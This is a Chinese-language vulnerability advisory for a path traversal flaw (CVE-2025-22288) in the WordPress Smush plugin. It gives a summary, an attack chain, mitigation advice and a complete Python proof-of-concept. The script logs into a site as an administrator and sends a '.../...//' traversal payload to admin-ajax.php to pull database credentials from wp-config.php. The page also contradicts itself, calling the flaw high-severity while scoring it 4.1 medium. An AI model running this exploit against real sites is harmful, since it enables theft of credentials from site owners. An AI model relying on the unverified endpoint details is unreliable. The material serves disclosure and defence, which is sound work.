CVE-2025-22288: WordPress Smush插件路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-22288

漏洞类型

路径遍历（Path Traversal）

CVSS评分

4.1 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Smush Image Compression and Optimization plugin (wp-smushit)

漏洞概述

CVE-2025-22288是WPMU DEV开发的WordPress Smush图像压缩优化插件中的一个高危路径遍历漏洞。该漏洞允许具有高权限的认证用户通过构造特殊的路径字符串'.../...//'来绕过安全限制，访问服务器上的敏感文件。攻击者可利用此漏洞读取WordPress安装目录之外的系统文件，可能导致配置文件、凭据、其他插件数据等敏感信息泄露。由于该漏洞需要高权限用户触发，且影响机密性较低，因此CVSS评分仅为4.1（中危）。但对于多用户WordPress环境，仍需警惕横向权限提升风险。漏洞存在于Smush插件3.17.0及以下所有版本，攻击复杂度低，无需用户交互即可利用。

技术细节

该路径遍历漏洞源于Smush插件在处理图像压缩请求时对用户输入的文件路径验证不充分。攻击者可通过构造特殊编码的路径字符串'.../...//'来绕过简单的路径检查逻辑。漏洞点主要位于插件的文件处理模块，当插件接收用户指定的图像文件路径时，未能正确规范化或验证路径遍历序列。攻击者利用'../'序列可以跳出Web根目录，访问任意文件系统路径。例如，通过上传请求或API调用指定类似'.../...//etc/passwd'的路径，插件会尝试处理该文件并进行压缩操作，从而导致敏感文件内容被读取。漏洞的利用需要攻击者具有WordPress站点的高权限账户（如管理员或编辑角色），这在一定程度上限制了其影响范围。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress站点的高权限账户（管理员或编辑权限）

STEP 2

步骤2

攻击者构造包含路径遍历序列的恶意请求，使用'.../...//'模式绕过基础过滤

STEP 3

步骤3

通过Smush插件的图像处理接口发送特制的文件路径参数

STEP 4

步骤4

插件解析路径时未正确过滤遍历序列，路径被规范化后指向敏感文件

STEP 5

步骤5

攻击者接收到包含敏感文件内容的响应，如wp-config.php中的数据库凭据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-22288 Path Traversal PoC
# Target: WordPress with Smush plugin <= 3.17.0

def exploit_cve_2025_22288(target_url, wp_user, wp_password):
    """
    Exploit path traversal vulnerability in Smush plugin
    Target: WordPress site with wp-smushit plugin <= 3.17.0
    Required: High privilege WordPress user credentials
    """
    
    # Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': wp_user,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    print(f"[*] Logging in to {target_url}...")
    resp = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Path traversal payload targeting wp-config.php
    # Using '.../...//' pattern to bypass basic filters
    traversal_payload = ".../...//.../...//wp-config.php"
    
    # Smush API endpoint for image optimization
    smush_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Construct malicious request
    exploit_data = {
        'action': 'smush_optimize_file',
        'file_path': traversal_payload,
        'filename': 'malicious.png'
    }
    
    print(f"[*] Sending path traversal payload: {traversal_payload}")
    resp = session.post(smush_url, data=exploit_data)
    
    if resp.status_code == 200:
        print(f"[+] Response received (Status: {resp.status_code})")
        print(f"[*] Response preview: {resp.text[:500]}")
        
        # Check if sensitive data was leaked
        if 'DB_NAME' in resp.text or 'DB_USER' in resp.text:
            print("[!] VULNERABLE! Database credentials leaked!")
            return True
        elif resp.text and len(resp.text) > 100:
            print("[!] Potential file content leaked - manual verification needed")
            return True
    
    print("[-] Exploitation may have failed or target is patched")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <wp_user> <wp_password>")
        print(f"Example: python {sys.argv[0]} http://example.com admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    
    exploit_cve_2025_22288(target, user, password)

影响范围

Smush Image Compression and Optimization plugin <= 3.17.0

防御指南

临时缓解措施

建议所有使用Smush插件的WordPress站点立即升级到3.17.1或更高版本。如果无法立即升级，可临时禁用Smush插件的图像处理API端点，或通过Web服务器配置限制对敏感文件的访问。同时应审查具有高权限的WordPress用户账户，确保没有可疑账户存在。对于无法升级的生产环境，建议使用防火墙规则阻止包含'../'或'....'等路径遍历模式的请求。